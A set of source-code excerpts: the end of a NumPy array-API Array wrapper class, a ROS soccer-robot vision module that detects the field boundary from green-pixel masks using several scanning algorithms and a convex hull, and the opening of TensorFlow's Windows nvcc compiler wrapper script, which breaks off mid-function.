""" Performs the operation __rxor__. """ other = self._check_allowed_dtypes(other, "integer or boolean", "__rxor__") if other is NotImplemented: return other self, other = self._normalize_two_args(self, other) res = self._array.__rxor__(other._array) return self.__class__._new(res) def to_device(self: Array, device: Device, /, stream: None = None) -> Array: if stream is not None: raise ValueError("The stream argument to to_device() is not supported") if device == 'cpu': return self raise ValueError(f"Unsupported device {device!r}") @property def dtype(self) -> Dtype: """ Array API compatible wrapper for :py:meth:`np.ndarray.dtype <numpy.ndarray.dtype>`. See its docstring for more information. """ return self._array.dtype @property def device(self) -> Device: return "cpu" # Note: mT is new in array API spec (see matrix_transpose) @property def mT(self) -> Array: from .linalg import matrix_transpose return matrix_transpose(self) @property def ndim(self) -> int: """ Array API compatible wrapper for :py:meth:`np.ndarray.ndim <numpy.ndarray.ndim>`. See its docstring for more information. """ return self._array.ndim @property def shape(self) -> Tuple[int, ...]: """ Array API compatible wrapper for :py:meth:`np.ndarray.shape <numpy.ndarray.shape>`. See its docstring for more information. """ return self._array.shape @property def size(self) -> int: """ Array API compatible wrapper for :py:meth:`np.ndarray.size <numpy.ndarray.size>`. See its docstring for more information. """ return self._array.size @property def T(self) -> Array: """ Array API compatible wrapper for :py:meth:`np.ndarray.T <numpy.ndarray.T>`. See its docstring for more information. """ # Note: T only works on 2-dimensional arrays. See the corresponding # note in the specification: # https://data-apis.org/array-api/latest/API_specification/array_object.html#t if self.ndim != 2: raise ValueError("x.T requires x to have 2 dimensions. Use x.mT to transpose stacks of matrices and permute_dims() to permute dimensions.") return self.__class__._new(self._array.T)
the-stack_106_24406
import numpy as np import cv2 import rospy import abc import math import tf2_ros as tf2 from tf.transformations import euler_from_quaternion from .color import ColorDetector from operator import itemgetter class FieldBoundaryDetector(object): """ The abstract class :class:`.FieldBoundaryDetector` is used for detecting the field boundary in various ways. The task of such a detector is the localisation of the edges of the field in the image. It returns a list of points that form this so called field boundary. It requires the ColorDetector to find the green pixels that are used to identify the field in the picture. The pixels of the field boundary are found by traversing the picture column wise in steps of a given length. Because obstacles can obscure the edges of the field, sometimes the first green pixel from the top of the picture is found at the bottom of the respective obstacle. Therefore not all of the points are located in a straight line and the field boundary contains multiple dents. Additionally white field markings and green pixels in the field that are false negatives can create small dents too. Besides the normal field boundary, the :class:`.FieldBoundaryDetector` can also create a convex field boundary that forms a convex hull over the dents of the detected field boundary and is therefore completely straight (with the exception of the corners of the field). """ def __init__(self, config, field_color_detector): # type: (dict, ColorDetector) -> None """ Initialization of :class:`.FieldBoundaryDetector`. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ # set variables: self._image = None self._field_boundary_points = None self._field_boundary_full = None self._convex_field_boundary_points = None self._convex_field_boundary_full = None self._mask = None self._algorithm = None self._field_color_detector = field_color_detector # init config: self._x_steps = config['field_boundary_detector_horizontal_steps'] self._y_steps = config['field_boundary_detector_vertical_steps'] self._roi_height = config['field_boundary_detector_roi_height'] self._roi_width = config['field_boundary_detector_roi_width'] self._roi_increase = config['field_boundary_detector_roi_increase'] self._green_threshold = config['field_boundary_detector_green_threshold'] # Set if values should be cached self._caching = config['caching'] @staticmethod def get_by_name(search_method): # type: (String) -> FieldBoundaryDetector """ Returns the matching field boundary detector for an String. :param image: the current frame of the video feed """ detectors = { 'dynamic': DynamicFieldBoundaryDetector, 'binary': BinaryFieldBoundaryDetector, 'reversed': ReversedFieldBoundaryDetector, 'downsampling_reversed': DownsamplingReversedFieldBoundaryDetector, 'iteration': IterationFieldBoundaryDetector, } return detectors[search_method] def set_image(self, image): # type: (np.matrix) -> None """ Refreshes the variables after receiving an image. :param image: the current frame of the video feed """ self._image = image self._field_boundary_points = None self._field_boundary_full = None self._convex_field_boundary_full = None self._convex_field_boundary_points = None self._mask = None def get_mask(self, offset=0): # type: () -> np.array """ :param offset: A vertical field boundary offset shift :return: np.array """ # Compute mask (cached) self._compute_mask() return self._shift_field_boundary_mask(self._mask, offset) def _shift_field_boundary_mask(self, mask, offset): shape = mask.shape if offset == 0: return mask elif offset < 0: # Shift mask downwards offset = min(-offset, shape[0]-1) frame = np.zeros(shape, dtype=np.uint8) # Add mask with offset frame[offset:shape[0]-1] = mask[0:shape[0]-1-offset] elif offset > 0: # Shift mask upwards offset = min(offset, shape[0]-1) frame = np.ones(shape, dtype=np.uint8) frame = frame * 255 # Add mask with offset frame[0:shape[0]-1-offset] = mask[offset:shape[0]-1] return frame def _compute_mask(self): # type: () -> None """ Calculates a mask that contains white pixels below the field-boundary """ # Check if field boundary is already cached if self._mask is None or not self._caching: shape = np.shape(self._image) img_size = (shape[0], shape[1]) # Generates a white canvas canvas = np.ones(img_size, dtype=np.uint8) * 255 hpoints = np.array([[(0, 0)] + self.get_field_boundary_points() + [(shape[1] - 1, 0)]]) # Blacks out the part over the field_boundary self._mask = cv2.fillPoly(canvas, hpoints, 0) def get_field_boundary_points(self, offset=0): # type: (int) -> list """ calculates the field-boundary if not calculated yet and returns a list containing coordinates on the picture where the field-boundary is. the offset works UPWARDS! :return list of x,y tuples of the field_boundary: """ if self._field_boundary_points is None or not self._caching: self._compute_field_boundary_points() # applying the offset if offset != 0: return [(point[0], point[1] - offset) for point in self._field_boundary_points] return self._field_boundary_points def _compute_field_boundary_points(self): """ calls the method to compute the field boundary points and saves it in the class variable _field_boundary_points """ self._field_boundary_points = self._algorithm._calculate_field_boundary( self._image, self._field_color_detector, self._x_steps, self._y_steps, self._roi_height, self._roi_width, self._roi_increase, self._green_threshold) def get_convex_field_boundary_points(self): ''' returns a set of field_boundary points that form a convex hull of the field ''' if self._convex_field_boundary_points is None or not self._caching: self._compute_convex_field_boundary_points() return self._convex_field_boundary_points def _compute_convex_field_boundary_points(self): """ returns a set of field_boundary points that form a convex hull of the field """ field_boundary_points = self.get_field_boundary_points() # calculate the "convex hull" of the field_boundary points self._convex_field_boundary_points = self._graham(field_boundary_points) def _graham(self, points): ''' This is a modified Graham's convex hull algorithm. Instead of returning the list of points that form the entire convex hull of the input point set, it returns only the "half" of the hull which has the lower y-coordinates and spans between the points with x=0 and x=self._image.shape[1]-1. :param points: list of points (a point is a 2D array (x,y)) with increasing x-coordinates, including one point with x = 0 and one point with x = self._image.shape[1]-1 :return: list of points, see above for more detail ''' if len(points) < 3: # there is no convex hull if less than three points are given return points # sort by increasing x-coordinates, then sort points with the same x-coordinate # by increasing y-coordinates my_points = sorted(points, key=lambda p: (p[0] + 1) * self._image.shape[1] + p[1]) # take the bottommost point p0 = my_points[0] # sort the points according to the angle between the vector p0 -> p # and the inverted y-axis my_points[1:] = sorted(my_points[1:], key=lambda p: self._graham_point_sort(p, p0)) num_points = len(my_points) # the stack contains the current hull points, top of the stack is the # last element in the list stack = [my_points[0], my_points[1]] i = 2 while (i < num_points) and (stack[-1][0] != self._image.shape[1] - 1): if len(stack) < 2 or self._ccw(stack[-1], stack[-2], my_points[i]) <= 0: # extend the hull stack.append(my_points[i]) i += 1 else: # an interior angle > 180 degrees is located at the last point in the hull, # thus this point cannot be part of the convex hull stack.pop() return stack def _graham_point_sort(self, p, p0): ''' used to sort the points given to Graham's convex hull algorithm returns the cosine of the angle between the vector p0->p and the inverted y-axis (the vector (0,-1)) ''' return -(p0[1] - p[1]) / (np.sqrt((p[0] - p0[0]) ** 2 + (p[1] - p0[1]) ** 2)) def _ccw(self, p1, p2, p3): ''' returns whether the given points p1, p2 and p3 are counter-clockwise (returns a value > 0) clockwise (returns a value < 0) or collinear (returns 0) to each other ''' return (p2[0] - p1[0]) * (p3[1] - p1[1]) - (p2[1] - p1[1]) * (p3[0] - p1[0]) def _compute_full_field_boundary(self): if self._field_boundary_full is None or not self._caching: xp, fp = zip(*self.get_field_boundary_points()) x = list(range(self._image.shape[1])) self._field_boundary_full = np.interp(x, list(xp), list(fp)) def get_full_field_boundary(self): # type: () -> list """ Calculates an interpolated list of y coordinates where the field_boundary is for the picture the index of the y value is the x coordinate on the picture. :return list of y coordinates where the field_boundary is. Index of y value is the x coordinate: """ self._compute_full_field_boundary() return self._field_boundary_full def _compute_full_convex_field_boundary(self): # type: () -> list """ Calculates an interpolated list of y coordinates where the convex field_boundary is for the picture the index of the y value is the x coordinate on the picture. :return list of y coordinates where the convex field_boundary is. Index of y value is the x coordinate: """ if self._convex_field_boundary_full is None or not self._caching: xp, fp = zip(*self.get_convex_field_boundary_points()) x = list(range(self._image.shape[1])) self._convex_field_boundary_full = np.interp(x, list(xp), list(fp)) def get_full_convex_field_boundary(self): # type: () -> list """ Calculates an interpolated list of y coordinates where the convex field_boundary is for the picture the index of the y value is the x coordinate on the picture. :return list of y coordinates where the convex field_boundary is. Index of y value is the x coordinate: """ self._compute_full_convex_field_boundary() return self._convex_field_boundary_full def candidate_under_field_boundary(self, candidate, y_offset=0): # type: (tuple, int) -> bool """ Returns whether the candidate is under the field_boundary or not. :param candidate: the candidate :param y_offset: an offset in y-direction (higher offset allows points in a wider range over the field_boundary) :return: whether the candidate is under the field_boundary or not """ footpoint = candidate.get_lower_center_point() footpoint_with_offset = (footpoint[0], footpoint[1] + y_offset) return self.point_under_field_boundary(footpoint_with_offset) def candidate_under_convex_field_boundary(self, candidate, y_offset=0): # type: (tuple, int) -> bool """ Returns whether the candidate is under the convex field_boundary or not. :param candidate: the candidate :param y_offset: an offset in y-direction (higher offset allows points in a wider range over the field_boundary) :return: whether the candidate is under the convex field_boundary or not """ footpoint = candidate.get_lower_center_point() footpoint_with_offset = (footpoint[0], footpoint[1] + y_offset) return self.point_under_convex_field_boundary(footpoint_with_offset) def candidates_under_field_boundary(self, candidates, y_offset=0): # type: (list, int) -> list """ Removes candidates that are not under the field boundary from list. :param balls: list of all candidates :param y_offset: If the ball is within this offset over the field boundary its still accepted. :return: list of candidates under the field boundary """ return [candidate for candidate in candidates if self.candidate_under_field_boundary(candidate, y_offset)] def candidates_under_convex_field_boundary(self, candidates, y_offset=0): # type: (list, int) -> list """ Removes candidates that are not under the convex field boundary from list. :param balls: list of all candidates :param y_offset: If the ball is within this offset over the field boundary its still accepted. :return: list of candidates under convex the field boundary """ return [candidate for candidate in candidates if self.candidate_under_convex_field_boundary(candidate, y_offset)] def point_under_field_boundary(self, point, offset=0): # type: (tuple, int) -> bool """ Returns if given coordinate is a point under field_boundary. :param point: coordinate (x, y) to test :param offset: offset of pixels to still be accepted as under the field_boundary. Default is 0. :return a boolean if point is under field_boundary: """ if not 0 <= point[0] < len(self.get_full_field_boundary()): rospy.logwarn('point_under_field_boundary got called with an out of bounds field_boundary point', logger_name="vision_field_boundary") return False return point[1] + offset > self.get_full_field_boundary()[point[0]] def point_under_convex_field_boundary(self, point, offset=0): # type: (tuple, int) -> bool """ Returns if given coordinate is a point under the convex field_boundary. :param point: coordinate (x, y) to test :param offset: offset of pixels to still be accepted as under the field_boundary. Default is 0. :return a boolean if point is under the convex field_boundary: """ if not 0 <= point[0] < len(self.get_full_convex_field_boundary()): rospy.logwarn('point_under_field_boundary got called with an out of bounds field_boundary point', logger_name="vision_field_boundary") return False return point[1] + offset > self.get_full_convex_field_boundary()[point[0]] def get_upper_bound(self, y_offset=0): # type: () -> int """ Returns the y-value of highest point of the field_boundary (lowest y-value). :return: int(), y-value of highest point of the field_boundary (lowest y-value) """ return max(0, int(min(self.get_field_boundary_points(), key=itemgetter(1))[1] - y_offset)) def _equalize_points(self, points): # type: (list) -> list """ Returns a list of the input points with smoothed y-coordinates to reduce the impact of outlier points in the field_boundary, which are caused by detection errors. :param points: list of input points consisting of tuples (x, y) :return: list of input points with smoothed y-coordinates consisting of tuples (x, y) """ equalized_points = list() equalized_points.append(points[0]) buffer0 = points[0] buffer1 = points[1] for i in range(2, len(points)): buffer2 = points[i] equalized_points.append((buffer1[0], int(round((((buffer0[1] + buffer2[1]) / 2.0) + buffer1[1]) / 2.0)))) buffer0 = buffer1 buffer1 = buffer2 equalized_points.append(points[-1]) return equalized_points class IterationFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.IterationFieldBoundaryDetector` uses the iteration detection method and finds the field boundary via scan lines running down from top to bottom. """ def __init__(self, config, field_color_detector): """ Initialization of :class:`.IterationFieldBoundaryDetector`. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(IterationFieldBoundaryDetector, self).__init__(config, field_color_detector) self._algorithm = IterationFieldBoundaryAlgorithm class BinaryFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.BinaryFieldBoundaryDetector` uses the binary detection method and finds the field boundary via binary search. """ def __init__(self, config, field_color_detector): """ Initialization of :class:`.BinaryFieldBoundaryDetector`. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(BinaryFieldBoundaryDetector, self).__init__(config, field_color_detector) self._algorithm = BinaryFieldBoundaryAlgorithm class ReversedFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.ReversedFieldBoundaryDetector` uses the reversed detection method and finds the field boundary via scan lines running up from bottom to top. """ def __init__(self, config, field_color_detector): """ Initialization of :class:`.ReversedFieldBoundaryDetector::. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(ReversedFieldBoundaryDetector, self).__init__(config, field_color_detector) self._algorithm = ReversedFieldBoundaryAlgorithm class DownsamplingReversedFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.DownsamplingReversedFieldBoundaryDetector` samples the resolution down and uses the reversed detection method and finds the field boundary via scan lines running up from bottom to top. """ def __init__(self, config, field_color_detector): """ Initialization of the DownsamplingReversedFieldBoundaryDetector. :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(DownsamplingReversedFieldBoundaryDetector, self).__init__(config, field_color_detector) self._algorithm = DownsamplingReversedFieldBoundaryAlgorithm class DynamicFieldBoundaryDetector(FieldBoundaryDetector): """ The :class:`.DynamicFieldBoundaryDetector` switches dynamically between the iteration and reversed iteration method depending on how much the robot's head is tilted. This improves performance (iteration) and enables operation with two field next to each other (reversed). """ def __init__(self, config, field_color_detector): """ Initialization of the DynamicFieldBoundaryDetector :param config: the configuration contained in visionparams.yaml :param field_color_detector: checks whether a color is part of the field colors """ super(DynamicFieldBoundaryDetector, self).__init__(config, field_color_detector) self._over_horizon_algorithm = ReversedFieldBoundaryAlgorithm self._under_horizon_algorithm = IterationFieldBoundaryAlgorithm self._base_frame = "camera_optical_frame" self._camera_frame = "base_footprint" self._tilt_threshold = math.radians(config['field_boundary_detector_head_tilt_threshold']) # TF stuff self._tf_buffer = tf2.Buffer(cache_time=rospy.Duration(5)) self._tf_listener = tf2.TransformListener(self._tf_buffer) def _only_field_visible(self): """ Check head orientation and decide if we should use the iteration or reversed iteration method. """ # Check if we can use tf. Otherwise switch to reversed iteration detector try: # Get quaternion from newest tf orientation = self._tf_buffer.lookup_transform(self._camera_frame, self._base_frame, rospy.Time(0)).transform.rotation # Convert into an usable tilt angle tilt_angle = (1.5 * math.pi - euler_from_quaternion(( orientation.x, orientation.y, orientation.z, orientation.w))[0]) % (2 * math.pi) # Check if it satisfied the threshold if tilt_angle > self._tilt_threshold and tilt_angle < math.pi: return True else: return False # Switch to reversed iteration detector except tf2.LookupException: rospy.logwarn_throttle(2, "TF for dynamic field boundary algorithm selection not active. Maybe TF becomes avalabile in a few seconds. Using reversed iteration method instead", logger_name="vision_field_boundary") return False except tf2.ExtrapolationException as ecp: # Warn user rospy.logwarn_throttle(2, "Extrapolation exception! Not able to use tf for dynamic field boundary algorithm selection. Using reversed iteration method instead", logger_name="vision_field_boundary") return False except tf2.ConnectivityException as ecp: # Warn user rospy.logwarn_throttle(2, "Connectivity exception! Not able to use tf for dynamic field boundary algorithm selection. Using reversed iteration method instead. \n" + ecp) return False def _compute_field_boundary_points(self): """ Calls the method to compute the field boundary and saves it in the class variable _field_boundary_points """ if self._only_field_visible(): self._algorithm = self._under_horizon_algorithm else: self._algorithm = self._over_horizon_algorithm # Calc field boundary super(DynamicFieldBoundaryDetector, self)._compute_field_boundary_points() class FieldBoundaryAlgorithm(): """ The abstract :class:`.FieldBoundaryAlgorithm` defines the interface for a field boundary algorithm, which finds the points of the field boundary visible in the image. """ @abc.abstractmethod def _calculate_field_boundary(_image, _field_color_detector, _x_steps, _y_steps, _roi_height, _roi_width, _roi_increase, _green_threshold): """ Finds the points of the field boundary in the image. :param np.ndarray _image: Image to calculate the field boundary on :param _field_color_detector: ColorDetector to detect field :type _field_color_detector: :class:`bitbots_vision.vision_module.color.ColorDetector` :param int _x_steps: Number of horizontal steps :param int _y_steps: Number of vertical steps :param int _roi_height: Height of Region Of Interest in which we are looking for green :param int _roi_width: Width of Region Of Interest in which we are looking for green :param int _roi_increase: Value that increases the region of interest, if it is located lower in the image :param int _green_threshold: Threshold of green in the area covered by the kernel :returns [(int, int)]: list of field boundary points """ raise NotImplementedError class IterationFieldBoundaryAlgorithm(FieldBoundaryAlgorithm): """ The :class:`.IterationFieldBoundaryAlgorithm` finds the points of the field boundary visible in the image. Uses the standard method, iterating from top to bottom until it finds enough green points. """ @staticmethod def _calculate_field_boundary(_image, _field_color_detector, _x_steps, _y_steps, _roi_height, _roi_width, _roi_increase, _green_threshold): # calculate the field_mask which contains 0 for non-green pixels and 255 for green pixels in the image field_mask = _field_color_detector.get_mask_image() # noise reduction on the field_mask: field_mask = cv2.morphologyEx( field_mask, cv2.MORPH_CLOSE, np.ones((5, 5), dtype=np.uint8), iterations=2) # Syntax: cv2.resize(image, (width, height), type of interpolation) field_mask = cv2.resize(field_mask, (_x_steps, _y_steps), interpolation=cv2.INTER_LINEAR) # the stepsize is the number of pixels traversed in the image by going one step y_stepsize = (_image.shape[0] - 1) / float(_y_steps - 1) x_stepsize = (_image.shape[1] - 1) / float(_x_steps - 1) min_y = _image.shape[0] - 1 _field_boundary_points = [] for x_step in range(_x_steps): # traverse columns firstgreen = min_y # set field_boundary point to worst case x = int(round(x_step * x_stepsize)) # get x value of step (depends on image size) for y_step in range(_y_steps): # traverse rows y = int(round(y_step * y_stepsize)) # get y value of step (depends on image size) if field_mask[y_step, x_step] > 100: # when the pixel is in the color lookup table firstgreen = y break _field_boundary_points.append((x, firstgreen)) return _field_boundary_points class ReversedFieldBoundaryAlgorithm(FieldBoundaryAlgorithm): """ The :class:`.ReversedFieldBoundaryAlgorithm` finds the points of the field boundary visible in the image. Uses the reversed method iterating from bottom to top until it finds enough non green points. Useful for when two fields are adjacent to each other. """ @staticmethod def _calculate_field_boundary(_image, _field_color_detector, _x_steps, _y_steps, _roi_height, _roi_width, _roi_increase, _green_threshold): # calculate the field_mask which contains 0 for non-green pixels and 255 for green pixels in the image field_mask = _field_color_detector.get_mask_image() # noise reduction on the field_mask: # the stepsize is the number of pixels traversed in the image by going one step y_stepsize = (_image.shape[0] - 1) / float(_y_steps - 1) x_stepsize = (_image.shape[1] - 1) / float(_x_steps - 1) # the region of interest (roi) for a specific point is a rectangle with the point in the middle of its top row # the point is slightly left of center when the width is even roi_start_height_y = _roi_height roi_start_width_x = _roi_width roi_start_radius_x = roi_start_width_x // 2 # increase of roi radius per pixel, e.g. 0.1 increases the radius by 1 for every 10 pixels # this accommodates for size difference of objects in the image depending on their distance # and therefore height in image: roi_increase = _roi_increase # height/width/radius-in-x-direction of the roi after maximum increase at the bottom of the image roi_max_height_y = roi_start_height_y + int(_image.shape[0] * roi_increase * 2) roi_max_width_x = roi_start_width_x + int(_image.shape[0] * roi_increase * 2) roi_max_radius_x = roi_max_width_x // 2 # extents the outermost pixels of the image as the roi will go beyond the image at the edges # Syntax: cv2.copyMakeBorder(image, top, bottom, left, right, type of extension) field_mask = cv2.copyMakeBorder(field_mask, roi_start_height_y, 0, roi_max_radius_x, roi_max_radius_x, cv2.BORDER_REPLICATE) # uncomment this to use a kernel for the roi kernel = np.ones((roi_max_height_y, roi_max_width_x)) # creates a kernel with 0 everywhere # use this to fill in other values at specific places in the kernel kernel[0: int(roi_max_height_y // 5), int(roi_max_width_x // 2.2): int(roi_max_width_x - roi_max_width_x // 2.2)] = 10 green_threshold = _green_threshold _field_boundary_points = [] for x_step in range(_x_steps): # traverse columns (x_steps) top_green = roi_start_height_y # set field_boundary point to worst case # calculate the x coordinate in the image of a column: x_image = int(round(x_step * x_stepsize)) + roi_max_radius_x for y_step in range(_y_steps): # calculate the y coordinate in the image of a y_step: y_image = int(_image.shape[0] - (round(y_step * y_stepsize))) + roi_start_height_y # creates the roi for a point (y_image, x_image) roi_current_radius_x = roi_start_radius_x + int(y_image * roi_increase) roi_current_height_y = roi_start_height_y + int(y_image * roi_increase * 2) roi = field_mask[y_image - roi_current_height_y:y_image, x_image - (roi_current_radius_x - 1):x_image + roi_current_radius_x] # roi_mean = roi.mean() roi_mean = (roi * kernel[roi_current_height_y - 1, roi_current_radius_x * 2 - 1]).mean() # uncomment when using a kernel if roi_mean <= green_threshold: top_green = y_image break _field_boundary_points.append((x_image - roi_max_radius_x, top_green)) return _field_boundary_points class DownsamplingReversedFieldBoundaryAlgorithm(FieldBoundaryAlgorithm): """ The :class:`.DownsamplingReversedFieldBoundaryAlgorithm` finds the points of the field boundary visible in the image. Uses the reversed method iterating from bottom to top on a downsampled image until it finds enough non green points. Useful for when two fields are adjacent to each other. """ @staticmethod def _calculate_field_boundary(image, field_color_detector, x_steps, y_steps, roi_height, roi_width, roi_increase, green_threshold): # calculate the field_mask which contains 0 for non-green pixels and 255 for green pixels in the image field_mask = field_color_detector.get_mask_image() # Scale the image down subsampled_mask = cv2.resize(field_mask,(x_steps,y_steps), interpolation=cv2.INTER_AREA) # Define the blur kernel kernel = (2 * (roi_width // 2) + 1, 2 * (roi_height // 2) + 1) # Blur the downscaled image to fill holes in the field mask subsampled_mask = cv2.GaussianBlur(subsampled_mask, kernel, 0) field_boundary_points = [] # Iterate horizontally over the image for x_position in range(subsampled_mask.shape[1]): # Iterate vertically over the downscaled mask for y_position in range(subsampled_mask.shape[0]): # Invert the current vertical value max_y = (subsampled_mask.shape[0] - 1) - y_position # Check if we found a pixel under the threshold if subsampled_mask[max_y, x_position] < int(green_threshold / 1000 * 255): # Reset to last step max_y += roi_height // 2 break # Scale the field boundary points back to the original image field_boundary_points.append( (int((x_position + 0.5) * (field_mask.shape[1] / x_steps)), int(max_y * (field_mask.shape[0] / y_steps)))) # Fix a little offset at the image edges on the right and left field_boundary_points[0] = (0, field_boundary_points[0][1]) field_boundary_points[-1] = (field_mask.shape[1]-1, field_boundary_points[-1][1]) return field_boundary_points class BinaryFieldBoundaryAlgorithm(FieldBoundaryAlgorithm): """ The :class:`.BinaryFieldBoundaryAlgorithm` finds the points of the field boundary visible in the image. Uses a faster binary search method, that unfortunately finds some points below field lines. """ @staticmethod def _calculate_field_boundary(_image, _field_color_detector, _x_steps, _y_steps, _roi_height, _roi_width, _roi_increase, _green_threshold): # calculate the field_mask which contains 0 for non-green pixels and 255 for green pixels in the image field_mask = _field_color_detector.get_mask_image() # noise reduction on the field_mask: field_mask = cv2.morphologyEx( field_mask, cv2.MORPH_CLOSE, np.ones((5, 5), dtype=np.uint8), iterations=2) # the stepsize is the number of pixels traversed in the image by going one step y_stepsize = (_image.shape[0] - 1) / float(_y_steps - 1) x_stepsize = (_image.shape[1] - 1) / float(_x_steps - 1) # the region of interest (roi) for a specific point is a rectangle # with the point in the middle of its top row; the point is slightly left of center when the width is even roi_start_height_y = _roi_height roi_start_width_x = _roi_width roi_start_radius_x = roi_start_width_x // 2 # increase of roi radius per pixel, e.g. 0.1 increases the radius by 1 for every 10 pixels # this accommodates for size difference of objects in the image depending on their distance # and therefore height in image: roi_increase = _roi_increase # height/width/radius-in-x-direction of the roi after maximum increase at the bottom of the image roi_max_height_y = roi_start_height_y + int(_image.shape[0] * roi_increase * 2) roi_max_width_x = roi_start_width_x + int(_image.shape[0] * roi_increase * 2) roi_max_radius_x = roi_max_width_x // 2 # extents the outermost pixels of the image as the roi will go beyond the image at the edges # Syntax: cv2.copyMakeBorder(image, top, bottom, left, right, type of extension) field_mask = cv2.copyMakeBorder(field_mask, 0, roi_max_height_y, roi_max_radius_x, roi_max_radius_x, cv2.BORDER_REPLICATE) # uncomment this to use a kernel for the roi # kernel = np.zeros((roi_height, roi_width)) # creates a kernel with 0 everywhere # kernel[int(kernel_height/2):, :] = 1 # use this to fill in other values at specific places in the kernel green_threshold = _green_threshold _field_boundary_points = [] for x_step in range(0, _x_steps): # traverse columns (x_steps) roi_mean = 0 y_step = 0 roi_current_height_y = 0 # binary search for finding the first green pixel: first = 0 # top of the column last = _y_steps - 1 # bottom of the column # calculate the x coordinate in the image of a column: x_image = int(round(x_step * x_stepsize)) + roi_max_radius_x while first < last: y_step = (first + last) // 2 y_image = int(round(y_step * y_stepsize)) # calculate the y coordinate in the image of a y_step # creates the roi for a point (y_image, x_image) roi_current_radius_x = roi_start_radius_x + int(y_image * roi_increase) roi_current_height_y = roi_start_height_y + int(y_image * roi_increase * 2) roi = field_mask[y_image:y_image + roi_current_height_y, x_image - (roi_current_radius_x - 1):x_image + roi_current_radius_x] roi_mean = roi.mean() # roi_mean = (roi * kernel).sum() # uncomment when using a kernel if roi_mean > green_threshold: # is the roi green enough? # the value is green enough, therefore the field_boundary is somewhere above this point # the area left to search can be halved by setting the new "last" above "y_current" last = y_step - 1 else: # the value isn't green enough, therefore the field_boundary is somewhere below this point # the area left to search can be halved by setting the new "first" below "y_current" first = y_step + 1 # During binary search the field_boundary is either approached from the bottom or from the top. # When approaching the field_boundary from the top, # y_step stops one step above the field_boundary on a non green point. # Therefore the y_step has to be increased when it stops on a non green point. if roi_mean <= green_threshold: y_step += 1 # calculate the y coordinate in the image of the y_step the topmost green pixel was found on with an offset # of roi_height, as the region of interest extends this far below the point y_image = int(round(y_step * y_stepsize)) + roi_current_height_y _field_boundary_points.append((x_image - roi_max_radius_x, y_image)) return _field_boundary_points
the-stack_106_24407
#!/usr/bin/env python # Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Crosstool wrapper for compiling CUDA programs with nvcc on Windows. DESCRIPTION: This script is the Windows version of //third_party/gpus/crosstool/crosstool_wrapper_is_not_gcc """ from __future__ import print_function from argparse import ArgumentParser import os import subprocess import re import sys import pipes # Template values set by cuda_autoconf. CPU_COMPILER = ('/opt/rh/devtoolset-7/root/usr/bin/gcc') GCC_HOST_COMPILER_PATH = ('/opt/rh/devtoolset-7/root/usr/bin/gcc') NVCC_PATH = '/usr/local/cuda-10.0/bin/nvcc' NVCC_VERSION = '10.0' NVCC_TEMP_DIR = "C:\\Windows\\Temp\\nvcc_inter_files_tmp_dir" supported_cuda_compute_capabilities = [ "3.0", "6.0" ] def Log(s): print('gpus/crosstool: {0}'.format(s)) def GetOptionValue(argv, option): """Extract the list of values for option from options. Args: option: The option whose value to extract, without the leading '/'. Returns: 1. A list of values, either directly following the option, (eg., /opt val1 val2) or values collected from multiple occurrences of the option (eg., /opt val1 /opt val2). 2. The leftover options. """ parser = ArgumentParser(prefix_chars='/') parser.add_argument('/' + option, nargs='*', action='append') args, leftover = parser.parse_known_args(argv) if args and vars(args)[option]: return (sum(vars(args)[option], []), leftover) return ([], leftover) def _update_options(nvcc_options): if NVCC_VERSION in ("7.0",): return nvcc_options update_options = { "relaxed-constexpr" : "expt-relaxed-constexpr" } return [ update_options[opt] if opt in update_options else opt for opt in nvcc_options ] def GetNvccOptions(argv): """Collect the -nvcc_options values from argv. Args: argv: A list of strings, possibly the argv passed to main(). Returns: 1. The string that can be passed directly to nvcc. 2. The leftover options. """ parser = ArgumentParser() parser.add_argument('-nvcc_options', nargs='*', action='append') args, leftover = parser.parse_known_args(argv) if args.nvcc_options: options = _update_options(sum(args.nvcc_options, [])) return (['--' + a for a in options], leftover) return ([], leftover) def InvokeNvcc(argv, log=False): """Call nvcc with arguments assembled from argv. Args: argv: A list of strings, possibly the argv passed to main(). log: True if logging is requested. Returns: The return value of calling os.system('nvcc ' + args) """ src_files = [f for f in argv if re.search('\.cpp$|\.cc$|\.c$|\.cxx$|\.C$', f)] if len(src_files) == 0: raise Error('No source files found for cuda compilation.') out_file = [ f for f in argv if f.startswith('/Fo') ] if len(out_file) != 1: raise Error('Please sepecify exactly one output file for cuda compilation.') out = ['-o', out_file[0][len('/Fo'):]] nvcc_compiler_options, argv = GetNvccOptions(argv) opt_option, argv = GetOptionValue(argv, 'O') opt = ['-g', '-G'] if (len(opt_option) > 0 and opt_option[0] != 'd'): opt = ['-O2'] include_options, argv = GetOptionValue(argv, 'I') includes = ["-I " + include for include in include_options] defines, argv = GetOptionValue(argv, 'D') defines = ['-D' + define for define in defines] undefines, argv = GetOptionValue(argv, 'U') undefines = ['-U' + define for define in undefines] # The rest of the unrecongized options should be passed to host compiler host_compiler_options = [option for option in argv if option not in (src_files + out_file)] m_options = ["-m64"] nvccopts = ['-D_FORCE_INLINES'] for capability in supported_cuda_compute_capabilities: capability = capability.replace('.', '') nvccopts += [r'-gencode=arch=compute_%s,"code=sm_%s,compute_%s"' % ( capability, capability, capability)] nvccopts += nvcc_compiler_options nvccopts += undefines nvccopts += defines nvccopts += m_options nvccopts += ['--compiler-options="' + " ".join(host_compiler_options) + '"'] nvccopts += ['-x', 'cu'] + opt + includes + out + ['-c'] + src_files # If we don't specify --keep-dir, nvcc will generate intermediate files under TEMP # Put them under NVCC_TEMP_DIR instead, then Bazel can ignore files under NVCC_TEMP_DIR during dependency check # 